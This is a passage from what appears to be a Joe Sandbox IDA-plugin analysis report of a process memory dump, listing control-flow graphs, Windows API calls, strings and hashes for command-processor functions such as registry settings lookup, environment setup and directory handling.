252->258 253->251 254->253 255->241 259 5b26e-5b271 256->259 260 484fa-4852e RegQueryValueExW 256->260 257->260 258->255 261 484e1-484eb 258->261 259->260 264 5b277-5b27e 259->264 262 48534-4853a RegCloseKey 260->262 263 5b283-5b28a 260->263 261->248 265 484f1 261->265 262->211 266 5b28c-5b2b5 ExpandEnvironmentStringsW 263->266 267 5b2d9-5b2e1 263->267 264->260 265->256 269 5b2b7-5b2c8 call 4f3a0 266->269 270 5b2ca-5b2cc 266->270 267->262 268 5b2e7-5b2f4 call 4acb0 267->268 268->262 273 5b2d3 269->273 270->273 273->267
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000482D3
                                                                      • RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00048313
                                                                      • RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0004834D
                                                                      • RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0004839D
                                                                      • RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000483D7
                                                                      • RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00048427
                                                                      • RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00048498
                                                                      • RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00048526
                                                                      • RegCloseKey.KERNELBASE(?), ref: 0004853A
                                                                      • time.MSVCRT(00000000), ref: 00048554
                                                                      • srand.MSVCRT ref: 0004855B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: QueryValue$CloseOpensrandtime
                                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                      • API String ID: 145004033-3846321370
                                                                      • Opcode ID: 8314202599f4634bc0a003a5f2b99c9213f80ccaf5690c0fbb665d4a39030609
                                                                      • Instruction ID: eafd05fa1ec3a2e34c5dad08cd1c6c49fb53101c26d8d8e14982430da8b98481
                                                                      • Opcode Fuzzy Hash: 8314202599f4634bc0a003a5f2b99c9213f80ccaf5690c0fbb665d4a39030609
                                                                      • Instruction Fuzzy Hash: 01C18375900299DAEF319B50DD05BDE77B8FB08702F5084E6E689A2190DBF45EC8CF29

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 276 509b1-50a12 GetCurrentThreadId OpenThread call 4e2af HeapSetInformation RegOpenKeyExW 279 5e9c5-5e9ea RegQueryValueExW RegCloseKey 276->279 280 50a18-50a50 call 51f5b call 51f1a call 487ca 276->280 283 5e9f5-5ea03 call 463bd call 64840 279->283 290 50a55-50a59 280->290 291 5ea08-5ea10 call 51e70 283->291 290->283 292 50a5f-50a66 290->292 301 5ea12 291->301 294 50a6c-50a81 _setjmp3 292->294 295 5ea58-5ea6d _setjmp3 292->295 299 50a87 294->299 300 5ea1c-5ea24 294->300 297 5ea82-5ea85 295->297 298 5ea6f-5ea71 295->298 305 5ea87-5ea95 call 463bd call 64840 297->305 306 5eaaa-5eab3 call 4dd98 297->306 298->297 302 5ea73-5ea7b call 51e70 298->302 303 50a8a-50a8c 299->303 300->303 304 5ea2a-5ea2d 300->304 301->300 322 5ea7d 302->322 309 50ac5-50ac7 303->309 310 50a8e 303->310 304->303 325 5ea9a-5eaa2 call 51e70 305->325 320 5eab5-5eac5 _setmode 306->320 321 5eac6-5eac7 call 562c0 306->321 312 5ea52 309->312 313 50acd-50ad5 call 51e70 309->313 316 50a90-50a96 310->316 312->295 332 50ad7 313->332 323 50ae0-50af1 call 4c570 316->323 324 50a98-50a9c 316->324 320->321 334 5eacc-5eaff EnterCriticalSection LeaveCriticalSection call 4c570 321->334 329 5eb7f 322->329 338 50af7-50afa 323->338 339 5ea41-5ea49 call 51e70 323->339 324->316 330 50a9e-50aba call 4e310 GetConsoleOutputCP GetCPInfo call 4e2af 324->330 344 5eaa4 325->344 348 50abf 330->348 337 50ada exit 332->337 352 5eb01-5eb04 334->352 337->323 345 50b00-50b04 call 4e470 338->345 346 5ea32-5ea3a call 51e70 338->346 355 5ea4b-5ea4d 339->355 344->306 356 50b09-50b0b 345->356 358 5ea3c 346->358 348->309 353 5eb75-5eb7d call 51e70 352->353 354 5eb06-5eb70 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo call 4e2af call 4e470 call 4e310 GetConsoleOutputCP GetCPInfo call 4e2af 352->354 353->329 354->334 355->337 356->324 361 50b0d-50b10 356->361 358->329 361->324
                                                                      APIs
                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 000509CB
                                                                      • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 000509D8
                                                                        • Part of subcall function 0004E2AF: SetThreadUILanguage.KERNELBASE ref: 0004E2C6
                                                                      • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 000509ED
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00050A0A
                                                                      • _setjmp3.MSVCRT ref: 00050A72
                                                                      • GetConsoleOutputCP.KERNELBASE ref: 00050AA3
                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 00050AB4
                                                                      • exit.KERNELBASE ref: 00050ADA
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 0005E9E1
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 0005E9EA
                                                                        • Part of subcall function 00051F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,0005EF7C,?,00000000,00000000), ref: 00051FB2
                                                                        • Part of subcall function 00051F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,0005EF7C,?,00000000,00000000), ref: 00051FCE
                                                                        • Part of subcall function 00051F1A: GetConsoleOutputCP.KERNELBASE(00050A41), ref: 00051F1A
                                                                        • Part of subcall function 00051F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 00051F2B
                                                                        • Part of subcall function 00051F1A: memset.MSVCRT ref: 00051F45
                                                                        • Part of subcall function 000487CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0007CA04), ref: 000487EE
                                                                        • Part of subcall function 000487CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000487FA
                                                                        • Part of subcall function 000487CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0004880E
                                                                        • Part of subcall function 000487CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00067460,00000001), ref: 0004881B
                                                                        • Part of subcall function 000487CA: _get_osfhandle.MSVCRT ref: 00048828
                                                                        • Part of subcall function 000487CA: GetConsoleMode.KERNELBASE(00000000), ref: 00048830
                                                                        • Part of subcall function 000487CA: _get_osfhandle.MSVCRT ref: 0004883C
                                                                        • Part of subcall function 000487CA: GetConsoleMode.KERNELBASE(00000000), ref: 00048844
                                                                        • Part of subcall function 000487CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0004886A
                                                                        • Part of subcall function 000487CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000488A5
                                                                      • _setjmp3.MSVCRT ref: 0005EA5E
                                                                      Strings
                                                                      • DisableCMD, xrefs: 0005E9D9
                                                                      • Software\Policies\Microsoft\Windows\System, xrefs: 00050A00
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                      • API String ID: 4238206819-1920437939
                                                                      • Opcode ID: 55a2a4f5d805de5c06b305dfcc3ac876844bef554cd7ef0d1ec89e018ba1083c
                                                                      • Instruction ID: 47a06f5b2accfb9881ded627e26061a24f12acb8c145c3fc3e779320c521ee79
                                                                      • Opcode Fuzzy Hash: 55a2a4f5d805de5c06b305dfcc3ac876844bef554cd7ef0d1ec89e018ba1083c
                                                                      • Instruction Fuzzy Hash: 82711B70A00345AEFB54AF70DC46AAF3BA9FF05342B144439FD46E1192EB39DD488B26

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 370 500e9-50140 memset call 4e3f0 373 5e615-5e61d call 51e70 370->373 374 50146-5014b 370->374 380 5e61f-5e621 exit 373->380 375 5e627 374->375 376 50151-5016a GetModuleFileNameW call 4ec2e 374->376 381 5e632-5e63e call 4a976 375->381 376->381 384 50170-5017e call 4ec2e 376->384 380->375 388 5e643-5e64f call 4a976 381->388 384->388 389 50184-50192 call 4ec2e 384->389 394 5e654-5e660 call 4a976 388->394 389->394 395 50198-501a4 call 4ec2e 389->395 400 5e665-5e66a 394->400 395->400 401 501aa-501b6 call 4ec2e 395->401 402 5e672-5e67c call 4a62f 400->402 403 5e66c 400->403 408 5e714-5e724 _wcsicmp 401->408 409 501bc-501c4 401->409 410 5e67e-5e691 _wcsupr 402->410 411 5e6f8-5e6fd 402->411 403->402 408->409 414 5e72a-5e734 408->414 412 501c6-501d8 call 48bc7 409->412 413 501ee-501f3 409->413 415 5e693 410->415 416 5e699 410->416 417 5e705-5e70f call 4a976 411->417 418 5e6ff 411->418 424 501e2-501ed call 56b30 412->424 425 501da-501e1 ??_V@YAXPAX@Z 412->425 413->412 414->409 415->416 420 5e69c-5e6a5 416->420 417->408 418->417 420->420 423 5e6a7-5e6b0 420->423 427 5e6b2-5e6b8 423->427 428 5e6ba-5e6ce call 501f5 423->428 425->424 427->428 433 5e6e1-5e6e3 428->433 434 5e6d0-5e6d2 428->434 435 5e6e5 433->435 436 5e6eb 433->436 437 5e6d4 434->437 438 5e6da-5e6df 434->438 435->436 439 5e6f0-5e6f3 call 4fc40 436->439 437->438 438->439 439->411
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0005011A
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00050156
                                                                        • Part of subcall function 0004EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0006E590,00002000,?,00088BF0,00000000,?,?,00048F0D), ref: 0004EC51
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004EC77
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004EC8D
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECA3
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECB9
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECCF
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECE5
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ECF7
                                                                        • Part of subcall function 0004EC2E: _wcsicmp.MSVCRT ref: 0004ED0D
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 000501DB
                                                                      • exit.MSVCRT ref: 0005E621
                                                                      • _wcsupr.MSVCRT ref: 0005E683
                                                                      • _wcsicmp.MSVCRT ref: 0005E71A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                      • API String ID: 2336066422-4197029667
                                                                      • Opcode ID: b03e8e1acbbf718630f579a765bf0898ae0254333e036cf6849e43941284ce79
                                                                      • Instruction ID: 5e7f2718487f2761418dffbf5f7fa812a25066cdaf41113a1367b4040b565d5f
                                                                      • Opcode Fuzzy Hash: b03e8e1acbbf718630f579a765bf0898ae0254333e036cf6849e43941284ce79
                                                                      • Instruction Fuzzy Hash: C75105B4B002568BEF289B60CC956FF73A5EF50385F044479ED42A7181EF349F49879A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 441 48bc7-48be4 call 57d90 444 5b5d4-5b5d8 441->444 445 48bea-48c16 call 55a2e call 4e3f0 441->445 444->445 447 5b5de-5b5e3 444->447 452 5b774-5b77a call 561e6 445->452 453 48c1c-48c2d call 4acb0 445->453 449 48e67-48e76 447->449 456 5b77f 452->456 453->452 459 48c33-48c3a 453->459 458 5b781 456->458 460 48c3d-48c46 459->460 460->460 461 48c48-48c4c 460->461 462 48c4f-48c59 461->462 463 48c66-48c70 462->463 464 48c5b-48c60 462->464 466 48c76-48c85 GetCurrentDirectoryW 463->466 467 5b5f0 463->467 464->463 465 5b5e8-5b5eb 464->465 465->462 468 5b5fb 466->468 469 48c8b-48cb0 towupper iswalpha 466->469 467->468 471 5b606 468->471 470 48cb6-48cba 469->470 469->471 470->471 472 48cc0-48cde towupper 470->472 474 5b60f 471->474 473 48ce4-48cf8 GetFullPathNameW 472->473 472->474 475 48cfe-48d01 473->475 476 5b61a-5b622 GetLastError 473->476 474->476 478 48d07-48d0e 475->478 479 5b64c-5b66a call 561e6 _local_unwind4 475->479 477 5b627-5b647 call 561e6 _local_unwind4 476->477 482 48d14-48d19 478->482 483 5b674 478->483 479->483 486 5b747-5b767 call 561e6 _local_unwind4 482->486 487 48d1f-48d23 482->487 489 5b67f 483->489 486->458 487->489 490 48d29-48d2d 487->490 494 5b68a 489->494 490->486 492 48d33-48d37 490->492 493 48d3d 492->493 492->494 495 48d40-48d4a 493->495 497 5b695 494->497 495->495 496 48d4c-48d52 495->496 496->497 498 48d58 496->498 500 5b6a0 497->500 499 48d5b-48d73 call 57d82 498->499 504 48d75-48d7c 499->504 505 48d82-48d8c 499->505 503 5b6ab-5b6b6 GetLastError 500->503 506 48da2-48da9 503->506 507 5b6bc-5b6bf 503->507 504->505 508 48e77-48e7a 504->508 505->500 509 48d92-48d9c GetFileAttributesW 505->509 511 48dc9-48dd2 506->511 512 48dab-48db0 506->512 507->506 510 5b6c5-5b6c8 507->510 508->499 509->503 509->506 510->477 513 5b6ce 510->513 516 48dd4-48dd9 511->516 517 48dfa-48dfc 511->517 514 48db6-48dbc call 50207 512->514 515 5b6d3 512->515 513->506 527 48dc1-48dc3 514->527 521 5b6de 515->521 516->521 522 48ddf-48de9 GetFileAttributesW 516->522 518 48dfe-48e01 517->518 519 48e09-48e0e 517->519 523 48e03-48e07 518->523 524 48e1f-48e24 518->524 525 48e87-48e8d 519->525 526 48e10-48e19 SetCurrentDirectoryW 519->526 529 5b6e9-5b6f4 GetLastError 521->529 528 48def-48df4 522->528 522->529 523->519 523->524 530 48e26-48e30 call 4a976 524->530 531 48e8f-48e95 524->531 525->526 526->476 526->524 527->479 527->511 528->517 533 5b6ff-5b722 call 561e6 _local_unwind4 528->533 529->477 532 5b6fa 529->532 539 5b727-5b745 call 561e6 _local_unwind4 530->539 540 48e36-48e3e 530->540 531->530 532->477 533->449 539->456 542 48e97-48e9c 540->542 543 48e40-48e65 call 48e9e call 48e7f call 561e6 540->543 542->543 543->449
                                                                      APIs
                                                                        • Part of subcall function 00055A2E: memset.MSVCRT ref: 00055A5A
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000,?,00000104,?), ref: 00048C7A
                                                                      • towupper.MSVCRT ref: 00048C8F
                                                                      • iswalpha.MSVCRT ref: 00048CA4
                                                                      • towupper.MSVCRT ref: 00048CC4
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00048CF0
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00048D93
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00048DE0
                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00048E11
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0005B6AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                      • String ID:
                                                                      • API String ID: 1133067188-0
                                                                      • Opcode ID: 82678135e27e01e62064306c90a059d5488255715e112bc4de63ae0a161e4d02
                                                                      • Instruction ID: f571c1936898bc5b465c7df6d058f5cde920699d2f24acd9d208213fd42c36a8
                                                                      • Opcode Fuzzy Hash: 82678135e27e01e62064306c90a059d5488255715e112bc4de63ae0a161e4d02
                                                                      • Instruction Fuzzy Hash: B2B1E270E042159ADB68EF25DC45BFEB3B4EF14301F548579E81AE3190EB34AE88CB55

                                                                       Control-flow Graph (function at 0004E310; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004E318
                                                                      • SetConsoleMode.KERNELBASE(00000000), ref: 0004E322
                                                                      • _get_osfhandle.MSVCRT ref: 0004E32F
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 0004E339
                                                                      • _get_osfhandle.MSVCRT ref: 0004E35E
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 0004E368
                                                                      • _get_osfhandle.MSVCRT ref: 0004E390
                                                                      • SetConsoleMode.KERNELBASE(00000000), ref: 0004E39A
                                                                      • _get_osfhandle.MSVCRT ref: 0004E3C7
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0004E3D1
                                                                      • _get_osfhandle.MSVCRT ref: 0005DC35
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0005DC3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                      • String ID: CMD.EXE
                                                                      • API String ID: 1606018815-3025314500
                                                                      • Opcode ID: 55c65b58c072293ce1d6a1731ca2debfe5263719f928fc51c46e3a9cb9b014d8
                                                                      • Instruction ID: 83d3cebcf76e9257be1d4f0d47c4bffce88d9b7f25280bea3da57f7ebe971a10
                                                                      • Opcode Fuzzy Hash: 55c65b58c072293ce1d6a1731ca2debfe5263719f928fc51c46e3a9cb9b014d8
                                                                      • Instruction Fuzzy Hash: 41218EF0B00600AFFB145F34EC1EB1A3A64BB41716B04853AF64AD72A1DABDD9548F5A

                                                                       Control-flow Graph (function at 000459C0; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00045A10
                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00045A53
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00045A70
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00045A87
                                                                        • Part of subcall function 00050B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00050B40
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00045AA1
                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00045B09
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00045B13
                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00045B70
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00059B7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                      • String ID:
                                                                      • API String ID: 402963468-0
                                                                      • Opcode ID: 47767e07b2e2caada81835e552cfc6f663addd214d29c5233d6266041db9f373
                                                                      • Instruction ID: 5003bc889e565ff77d020214a0fed27bca67fcd1717e3ef4b07fc4421f623393
                                                                      • Opcode Fuzzy Hash: 47767e07b2e2caada81835e552cfc6f663addd214d29c5233d6266041db9f373
                                                                      • Instruction Fuzzy Hash: 2D91E271A00606DBEB34DB659C85ABBB7F4FF89312F1440B9E809E7181E7748D84CBA5

                                                                       Control-flow Graph (function at 00056903; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0006CA98,0000000C), ref: 00056940
                                                                      • _amsg_exit.MSVCRT ref: 00056955
                                                                      • _initterm.MSVCRT ref: 000569A9
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 000569D5
                                                                      • exit.MSVCRT ref: 00056A1C
                                                                      • _XcptFilter.MSVCRT ref: 00056A2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                      • String ID:
                                                                      • API String ID: 796493780-0
                                                                      • Opcode ID: 6f53f1fcd138838371350baaecc71a5a68e443c6e0051280edc22a5f6d17ab7f
                                                                      • Instruction ID: 2423a6c584e1f020e7a00889e9807541085ccd9f20f3b49148da3d947cc86724
                                                                      • Opcode Fuzzy Hash: 6f53f1fcd138838371350baaecc71a5a68e443c6e0051280edc22a5f6d17ab7f
                                                                      • Instruction Fuzzy Hash: AF315579A44751CFFB218B54EC4572A37E5FB05736F600039EA029B2E1EBBA5944CB42

                                                                       Control-flow Graph (function at 0004E2AF; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • SetThreadUILanguage.KERNELBASE ref: 0004E2C6
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,0004B952), ref: 0004E2D9
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(75550000,SetThreadUILanguage,00000000,0004B952), ref: 0004E2F9
                                                                      • SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,0004B952), ref: 0005DC08
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                      • API String ID: 1264603166-2530943252
                                                                      • Opcode ID: 075d327640b9abc057148a12d14c76ead7db1d6497d1749669ec694595369031
                                                                      • Instruction ID: 89b307d68ab39e482db4c81d4d29312f852b0667d8c25b9b3e5deb4a389090c7
                                                                      • Opcode Fuzzy Hash: 075d327640b9abc057148a12d14c76ead7db1d6497d1749669ec694595369031
                                                                      • Instruction Fuzzy Hash: B1F0B4B1A046609BFA605B34FE0C6593794FB05B72B150362F916E32E4C7BC9C81CBA9

                                                                       Control-flow Graph (function at 0004AD60; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • GetConsoleTitleW.KERNELBASE(?,00000104,73B29366,00000001,?), ref: 0004ADB6
                                                                        • Part of subcall function 00055A2E: memset.MSVCRT ref: 00055A5A
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • towupper.MSVCRT ref: 0004B0E3
                                                                        • Part of subcall function 0004E950: memset.MSVCRT ref: 0004E9A0
                                                                        • Part of subcall function 0004E950: wcschr.MSVCRT ref: 0004E9FC
                                                                        • Part of subcall function 0004E950: wcschr.MSVCRT ref: 0004EA14
                                                                        • Part of subcall function 0004E950: _wcsicmp.MSVCRT ref: 0004EA80
                                                                      • wcschr.MSVCRT ref: 0004AED2
                                                                      • wcsncmp.MSVCRT ref: 0004B016
